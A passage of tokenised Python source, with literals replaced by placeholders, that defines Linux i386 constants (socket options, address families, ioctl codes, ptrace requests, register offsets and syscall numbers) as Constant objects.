<NUM_LIT:3> ) <EOL> SO_ERROR = Constant ( '<STR_LIT>' , <NUM_LIT:4> ) <EOL> SO_DONTROUTE = Constant ( '<STR_LIT>' , <NUM_LIT:5> ) <EOL> SO_BROADCAST = Constant ( '<STR_LIT>' , <NUM_LIT:6> ) <EOL> SO_SNDBUF = Constant ( '<STR_LIT>' , <NUM_LIT:7> ) <EOL> SO_RCVBUF = Constant ( '<STR_LIT>' , <NUM_LIT:8> ) <EOL> SO_KEEPALIVE = Constant ( '<STR_LIT>' , <NUM_LIT:9> ) <EOL> SO_OOBINLINE = Constant ( '<STR_LIT>' , <NUM_LIT:10> ) <EOL> SO_NO_CHECK = Constant ( '<STR_LIT>' , <NUM_LIT:11> ) <EOL> SO_PRIORITY = Constant ( '<STR_LIT>' , <NUM_LIT:12> ) <EOL> SO_LINGER = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SO_BSDCOMPAT = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SO_PASSCRED = Constant ( '<STR_LIT>' , <NUM_LIT:16> ) <EOL> SO_PEERCRED = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SO_RCVLOWAT = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SO_SNDLOWAT = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SO_RCVTIMEO = Constant ( '<STR_LIT>' , <NUM_LIT:20> ) <EOL> SO_SNDTIMEO = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SO_ACCEPTCONN = Constant ( '<STR_LIT>' , <NUM_LIT:30> ) <EOL> SO_SNDBUFFORCE = Constant ( '<STR_LIT>' , <NUM_LIT:32> ) <EOL> SO_RCVBUFFORCE = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SO_SECURITY_AUTHENTICATION = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SO_SECURITY_ENCRYPTION_TRANSPORT = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SO_SECURITY_ENCRYPTION_NETWORK = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SO_BINDTODEVICE = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SO_ATTACH_FILTER = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SO_DETACH_FILTER = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SO_PEERNAME = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SO_TIMESTAMP = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SCM_TIMESTAMP = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SOCK_STREAM = Constant ( '<STR_LIT>' , <NUM_LIT:1> ) <EOL> SOCK_DGRAM = Constant ( '<STR_LIT>' , <NUM_LIT:2> ) <EOL> SOCK_RAW = Constant ( '<STR_LIT>' , <NUM_LIT:3> ) <EOL> SOCK_RDM = Constant ( '<STR_LIT>' , <NUM_LIT:4> ) <EOL> SOCK_SEQPACKET = Constant ( '<STR_LIT>' , <NUM_LIT:5> ) <EOL> SOCK_PACKET = Constant ( '<STR_LIT>' , <NUM_LIT:10> ) <EOL> UIO_FASTIOV = Constant ( '<STR_LIT>' , <NUM_LIT:8> ) <EOL> UIO_MAXIOV = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SCM_RIGHTS = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SCM_CREDENTIALS = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SCM_CONNECT = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> AF_UNSPEC = Constant ( '<STR_LIT>' , <NUM_LIT:0> ) <EOL> AF_UNIX = Constant ( '<STR_LIT>' , <NUM_LIT:1> ) <EOL> AF_LOCAL = Constant ( '<STR_LIT>' , <NUM_LIT:1> ) <EOL> AF_INET = Constant ( '<STR_LIT>' , <NUM_LIT:2> ) <EOL> AF_AX25 = Constant ( '<STR_LIT>' , <NUM_LIT:3> ) <EOL> AF_IPX = Constant ( '<STR_LIT>' , <NUM_LIT:4> ) <EOL> AF_APPLETALK = Constant ( '<STR_LIT>' , <NUM_LIT:5> ) <EOL> AF_NETROM = Constant ( '<STR_LIT>' , <NUM_LIT:6> ) <EOL> AF_BRIDGE = Constant ( '<STR_LIT>' , <NUM_LIT:7> ) <EOL> AF_ATMPVC = Constant ( '<STR_LIT>' , <NUM_LIT:8> ) <EOL> AF_X25 = Constant ( '<STR_LIT>' , <NUM_LIT:9> ) <EOL> AF_INET6 = Constant ( '<STR_LIT>' , <NUM_LIT:10> ) <EOL> AF_ROSE = Constant ( '<STR_LIT>' , <NUM_LIT:11> ) <EOL> AF_DECnet = Constant ( '<STR_LIT>' , <NUM_LIT:12> ) <EOL> AF_NETBEUI = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> AF_SECURITY = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> AF_KEY = Constant ( '<STR_LIT>' , <NUM_LIT:15> ) <EOL> AF_NETLINK = Constant ( '<STR_LIT>' , <NUM_LIT:16> ) <EOL> AF_ROUTE = Constant ( '<STR_LIT>' , <NUM_LIT:16> ) <EOL> AF_PACKET = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> AF_ASH = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> AF_ECONET = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> AF_ATMSVC = Constant ( '<STR_LIT>' , <NUM_LIT:20> ) <EOL> AF_SNA = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> AF_IRDA = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> AF_PPPOX = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> AF_WANPIPE = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> AF_MAX = Constant ( '<STR_LIT>' , <NUM_LIT:32> ) <EOL> PF_UNSPEC = Constant ( '<STR_LIT>' , <NUM_LIT:0> ) <EOL> PF_UNIX = Constant ( '<STR_LIT>' , <NUM_LIT:1> ) <EOL> PF_LOCAL = Constant ( '<STR_LIT>' , <NUM_LIT:1> ) <EOL> PF_INET = Constant ( '<STR_LIT>' , <NUM_LIT:2> ) <EOL> PF_AX25 = Constant ( '<STR_LIT>' , <NUM_LIT:3> ) <EOL> PF_IPX = Constant ( '<STR_LIT>' , <NUM_LIT:4> ) <EOL> PF_APPLETALK = Constant ( '<STR_LIT>' , <NUM_LIT:5> ) <EOL> PF_NETROM = Constant ( '<STR_LIT>' , <NUM_LIT:6> ) <EOL> PF_BRIDGE = Constant ( '<STR_LIT>' , <NUM_LIT:7> ) <EOL> PF_ATMPVC = Constant ( '<STR_LIT>' , <NUM_LIT:8> ) <EOL> PF_X25 = Constant ( '<STR_LIT>' , <NUM_LIT:9> ) <EOL> PF_INET6 = Constant ( '<STR_LIT>' , <NUM_LIT:10> ) <EOL> PF_ROSE = Constant ( '<STR_LIT>' , <NUM_LIT:11> ) <EOL> PF_DECnet = Constant ( '<STR_LIT>' , <NUM_LIT:12> ) <EOL> PF_NETBEUI = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> PF_SECURITY = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> PF_KEY = Constant ( '<STR_LIT>' , <NUM_LIT:15> ) <EOL> PF_NETLINK = Constant ( '<STR_LIT>' , <NUM_LIT:16> ) <EOL> PF_ROUTE = Constant ( '<STR_LIT>' , <NUM_LIT:16> ) <EOL> PF_PACKET = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> PF_ASH = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> PF_ECONET = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> PF_ATMSVC = Constant ( '<STR_LIT>' , <NUM_LIT:20> ) <EOL> PF_SNA = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> PF_IRDA = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> PF_PPPOX = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> PF_WANPIPE = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> PF_MAX = Constant ( '<STR_LIT>' , <NUM_LIT:32> ) <EOL> SOMAXCONN = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> MSG_OOB = Constant ( '<STR_LIT>' , <NUM_LIT:1> ) <EOL> MSG_PEEK = Constant ( '<STR_LIT>' , <NUM_LIT:2> ) <EOL> MSG_DONTROUTE = Constant ( '<STR_LIT>' , <NUM_LIT:4> ) <EOL> MSG_TRYHARD = Constant ( '<STR_LIT>' , <NUM_LIT:4> ) <EOL> MSG_CTRUNC = Constant ( '<STR_LIT>' , <NUM_LIT:8> ) <EOL> MSG_PROBE = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> MSG_TRUNC = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> MSG_DONTWAIT = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> MSG_EOR = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> MSG_WAITALL = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> MSG_FIN = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> MSG_EOF = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> MSG_SYN = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> MSG_CONFIRM = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> MSG_RST = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> MSG_ERRQUEUE = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> MSG_NOSIGNAL = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> MSG_MORE = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SOL_IP = Constant ( '<STR_LIT>' , <NUM_LIT:0> ) <EOL> SOL_TCP = Constant ( '<STR_LIT>' , <NUM_LIT:6> ) <EOL> SOL_UDP = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SOL_IPV6 = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SOL_ICMPV6 = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SOL_RAW = Constant ( '<STR_LIT>' , <NUM_LIT:255> ) <EOL> SOL_IPX = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SOL_AX25 = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SOL_ATALK = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SOL_NETROM = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SOL_ROSE = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SOL_DECNET = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SOL_X25 = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SOL_PACKET = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SOL_ATM = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SOL_AAL = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SOL_IRDA = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> IPX_TYPE = Constant ( '<STR_LIT>' , <NUM_LIT:1> ) <EOL> SHUT_RD = Constant ( '<STR_LIT>' , <NUM_LIT:0> ) <EOL> SHUT_WR = Constant ( '<STR_LIT>' , <NUM_LIT:1> ) <EOL> SHUT_RDWR = Constant ( '<STR_LIT>' , <NUM_LIT:2> ) <EOL> NI_NOFQDN = Constant ( '<STR_LIT>' , <NUM_LIT:1> ) <EOL> NI_NUMERICHOST = Constant ( '<STR_LIT>' , <NUM_LIT:2> ) <EOL> NI_NAMEREQD = Constant ( '<STR_LIT>' , <NUM_LIT:4> ) <EOL> NI_NUMERICSERV = Constant ( '<STR_LIT>' , <NUM_LIT:8> ) <EOL> NI_DGRAM = Constant ( '<STR_LIT>' , <NUM_LIT:16> ) <EOL> EAI_FAMILY = Constant ( '<STR_LIT>' , - <NUM_LIT:1> ) <EOL> EAI_SOCKTYPE = Constant ( '<STR_LIT>' , - <NUM_LIT:2> ) <EOL> EAI_BADFLAGS = Constant ( '<STR_LIT>' , - <NUM_LIT:3> ) <EOL> EAI_NONAME = Constant ( '<STR_LIT>' , - <NUM_LIT:4> ) <EOL> EAI_SERVICE = Constant ( '<STR_LIT>' , - <NUM_LIT:5> ) <EOL> EAI_ADDRFAMILY = Constant ( '<STR_LIT>' , - <NUM_LIT:6> ) <EOL> EAI_NODATA = Constant ( '<STR_LIT>' , - <NUM_LIT:7> ) <EOL> EAI_MEMORY = Constant ( '<STR_LIT>' , - <NUM_LIT:8> ) <EOL> EAI_FAIL = Constant ( '<STR_LIT>' , - <NUM_LIT:9> ) <EOL> EAI_AGAIN = Constant ( '<STR_LIT>' , - <NUM_LIT:10> ) <EOL> EAI_SYSTEM = Constant ( '<STR_LIT>' , - <NUM_LIT:11> ) <EOL> AI_NUMERICHOST = Constant ( '<STR_LIT>' , <NUM_LIT:1> ) <EOL> AI_CANONNAME = Constant ( '<STR_LIT>' , <NUM_LIT:2> ) <EOL> AI_PASSIVE = Constant ( '<STR_LIT>' , <NUM_LIT:4> ) <EOL> SIOCADDRT = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SIOCDELRT = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SIOCRTMSG = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SIOCGIFNAME = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SIOCSIFLINK = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SIOCGIFCONF = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SIOCGIFFLAGS = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SIOCSIFFLAGS = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SIOCGIFADDR = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SIOCSIFADDR = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SIOCGIFDSTADDR = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SIOCSIFDSTADDR = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SIOCGIFBRDADDR = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SIOCSIFBRDADDR = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SIOCGIFNETMASK = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SIOCSIFNETMASK = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SIOCGIFMETRIC = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SIOCSIFMETRIC = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SIOCGIFMEM = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SIOCSIFMEM = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SIOCGIFMTU = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SIOCSIFMTU = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SIOCSIFNAME = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SIOCSIFHWADDR = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SIOCGIFENCAP = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SIOCSIFENCAP = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SIOCGIFHWADDR = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SIOCGIFSLAVE = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SIOCSIFSLAVE = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SIOCADDMULTI = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SIOCDELMULTI = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SIOCGIFINDEX = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SIOGIFINDEX = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SIOCSIFPFLAGS = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SIOCGIFPFLAGS = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SIOCDIFADDR = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SIOCSIFHWBROADCAST = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SIOCGIFCOUNT = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SIOCGIFBR = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SIOCSIFBR = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SIOCGIFTXQLEN = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SIOCSIFTXQLEN = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SIOCGIFDIVERT = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SIOCSIFDIVERT = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SIOCETHTOOL = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SIOCDARP = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SIOCGARP = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SIOCSARP = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SIOCDRARP = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SIOCGRARP = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SIOCSRARP = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SIOCGIFMAP = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SIOCSIFMAP = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SIOCADDDLCI = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SIOCDELDLCI = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SIOCDEVPRIVATE = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> PTRACE_TRACEME = Constant ( '<STR_LIT>' , <NUM_LIT:0> ) <EOL> PTRACE_PEEKTEXT = Constant ( '<STR_LIT>' , <NUM_LIT:1> ) <EOL> PTRACE_PEEKDATA = Constant ( '<STR_LIT>' , <NUM_LIT:2> ) <EOL> PTRACE_PEEKUSR = Constant ( '<STR_LIT>' , <NUM_LIT:3> ) <EOL> PTRACE_PEEKUSER = Constant ( '<STR_LIT>' , <NUM_LIT:3> ) <EOL> PTRACE_POKETEXT = Constant ( '<STR_LIT>' , <NUM_LIT:4> ) <EOL> PTRACE_POKEDATA = Constant ( '<STR_LIT>' , <NUM_LIT:5> ) <EOL> PTRACE_POKEUSR = Constant ( '<STR_LIT>' , <NUM_LIT:6> ) <EOL> PTRACE_POKEUSER = Constant ( '<STR_LIT>' , <NUM_LIT:6> ) <EOL> PTRACE_CONT = Constant ( '<STR_LIT>' , <NUM_LIT:7> ) <EOL> PTRACE_KILL = Constant ( '<STR_LIT>' , <NUM_LIT:8> ) <EOL> PTRACE_SINGLESTEP = Constant ( '<STR_LIT>' , <NUM_LIT:9> ) <EOL> PTRACE_ATTACH = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> PTRACE_DETACH = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> PTRACE_SYSCALL = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> PTRACE_GETEVENTMSG = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> PTRACE_GETSIGINFO = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> PTRACE_SETSIGINFO = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> PTRACE_O_TRACESYSGOOD = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> PTRACE_O_TRACEFORK = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> PTRACE_O_TRACEVFORK = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> PTRACE_O_TRACECLONE = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> PTRACE_O_TRACEEXEC = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> PTRACE_O_TRACEVFORKDONE = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> PTRACE_O_TRACEEXIT = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> PTRACE_O_MASK = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> PTRACE_EVENT_FORK = Constant ( '<STR_LIT>' , <NUM_LIT:1> ) <EOL> PTRACE_EVENT_VFORK = Constant ( '<STR_LIT>' , <NUM_LIT:2> ) <EOL> PTRACE_EVENT_CLONE = Constant ( '<STR_LIT>' , <NUM_LIT:3> ) <EOL> PTRACE_EVENT_EXEC = Constant ( '<STR_LIT>' , <NUM_LIT:4> ) <EOL> PTRACE_EVENT_VFORK_DONE = Constant ( '<STR_LIT>' , <NUM_LIT:5> ) <EOL> PTRACE_EVENT_EXIT = Constant ( '<STR_LIT>' , <NUM_LIT:6> ) <EOL> PT_TRACE_ME = Constant ( '<STR_LIT>' , <NUM_LIT:0> ) <EOL> PT_READ_I = Constant ( '<STR_LIT>' , <NUM_LIT:1> ) <EOL> PT_READ_D = Constant ( '<STR_LIT>' , <NUM_LIT:2> ) <EOL> PT_READ_U = Constant ( '<STR_LIT>' , <NUM_LIT:3> ) <EOL> PT_WRITE_I = Constant ( '<STR_LIT>' , <NUM_LIT:4> ) <EOL> PT_WRITE_D = Constant ( '<STR_LIT>' , <NUM_LIT:5> ) <EOL> PT_WRITE_U = Constant ( '<STR_LIT>' , <NUM_LIT:6> ) <EOL> PT_CONTINUE = Constant ( '<STR_LIT>' , <NUM_LIT:7> ) <EOL> PT_KILL = Constant ( '<STR_LIT>' , <NUM_LIT:8> ) <EOL> PT_STEP = Constant ( '<STR_LIT>' , <NUM_LIT:9> ) <EOL> PT_ATTACH = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> PT_DETACH = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> EBX = Constant ( '<STR_LIT>' , <NUM_LIT:0> ) <EOL> ECX = Constant ( '<STR_LIT>' , <NUM_LIT:1> ) <EOL> EDX = Constant ( '<STR_LIT>' , <NUM_LIT:2> ) <EOL> ESI = Constant ( '<STR_LIT>' , <NUM_LIT:3> ) <EOL> EDI = Constant ( '<STR_LIT>' , <NUM_LIT:4> ) <EOL> EBP = Constant ( '<STR_LIT>' , <NUM_LIT:5> ) <EOL> EAX = Constant ( '<STR_LIT>' , <NUM_LIT:6> ) <EOL> DS = Constant ( '<STR_LIT>' , <NUM_LIT:7> ) <EOL> ES = Constant ( '<STR_LIT>' , <NUM_LIT:8> ) <EOL> FS = Constant ( '<STR_LIT>' , <NUM_LIT:9> ) <EOL> GS = Constant ( '<STR_LIT>' , <NUM_LIT:10> ) <EOL> ORIG_EAX = Constant ( '<STR_LIT>' , <NUM_LIT:11> ) <EOL> EIP = Constant ( '<STR_LIT>' , <NUM_LIT:12> ) <EOL> CS = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> EFL = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> UESP = Constant ( '<STR_LIT>' , <NUM_LIT:15> ) <EOL> SS = Constant ( '<STR_LIT>' , <NUM_LIT:16> ) <EOL> FRAME_SIZE = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> PTRACE_GETREGS = Constant ( '<STR_LIT>' , <NUM_LIT:12> ) <EOL> PTRACE_SETREGS = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> PTRACE_GETFPREGS = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> PTRACE_SETFPREGS = Constant ( '<STR_LIT>' , <NUM_LIT:15> ) <EOL> PTRACE_GETFPXREGS = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> PTRACE_SETFPXREGS = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> PTRACE_SETOPTIONS = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> PTRACE_O_TRACESYSGOOD = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_access = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_acct = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_add_key = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_adjtimex = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_afs_syscall = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_alarm = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_bdflush = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_break = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_brk = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_capget = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_capset = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_chdir = Constant ( '<STR_LIT>' , <NUM_LIT:12> ) <EOL> SYS_chmod = Constant ( '<STR_LIT>' , <NUM_LIT:15> ) <EOL> SYS_chown = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_chown32 = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_chroot = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_clock_getres = Constant ( '<STR_LIT>' , ( <NUM_LIT> + <NUM_LIT:7> ) ) <EOL> SYS_clock_gettime = Constant ( '<STR_LIT>' , ( <NUM_LIT> + <NUM_LIT:6> ) ) <EOL> SYS_clock_nanosleep = Constant ( '<STR_LIT>' , ( <NUM_LIT> + <NUM_LIT:8> ) ) <EOL> SYS_clock_settime = Constant ( '<STR_LIT>' , ( <NUM_LIT> + <NUM_LIT:5> ) ) <EOL> SYS_clone = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_close = Constant ( '<STR_LIT>' , <NUM_LIT:6> ) <EOL> SYS_creat = Constant ( '<STR_LIT>' , <NUM_LIT:8> ) <EOL> SYS_create_module = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_delete_module = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_dup = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_dup2 = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_dup3 = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_epoll_create = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_epoll_create1 = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_epoll_ctl = Constant ( '<STR_LIT>' , <NUM_LIT:255> ) <EOL> SYS_epoll_pwait = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_epoll_wait = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_eventfd = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_eventfd2 = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_execve = Constant ( '<STR_LIT>' , <NUM_LIT:11> ) <EOL> SYS_exit = Constant ( '<STR_LIT>' , <NUM_LIT:1> ) <EOL> SYS_exit_group = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_faccessat = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_fadvise64 = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_fadvise64_64 = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_fallocate = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_fanotify_init = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_fanotify_mark = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_fchdir = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_fchmod = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_fchmodat = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_fchown = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_fchown32 = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_fchownat = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_fcntl = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_fcntl64 = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_fdatasync = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_fgetxattr = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_flistxattr = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_flock = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_fork = Constant ( '<STR_LIT>' , <NUM_LIT:2> ) <EOL> SYS_fremovexattr = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_fsetxattr = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_fstat = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_fstat64 = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_fstatat64 = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_fstatfs = Constant ( '<STR_LIT>' , <NUM_LIT:100> ) <EOL> SYS_fstatfs64 = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_fsync = Constant ( '<STR_LIT>' , <NUM_LIT> ) 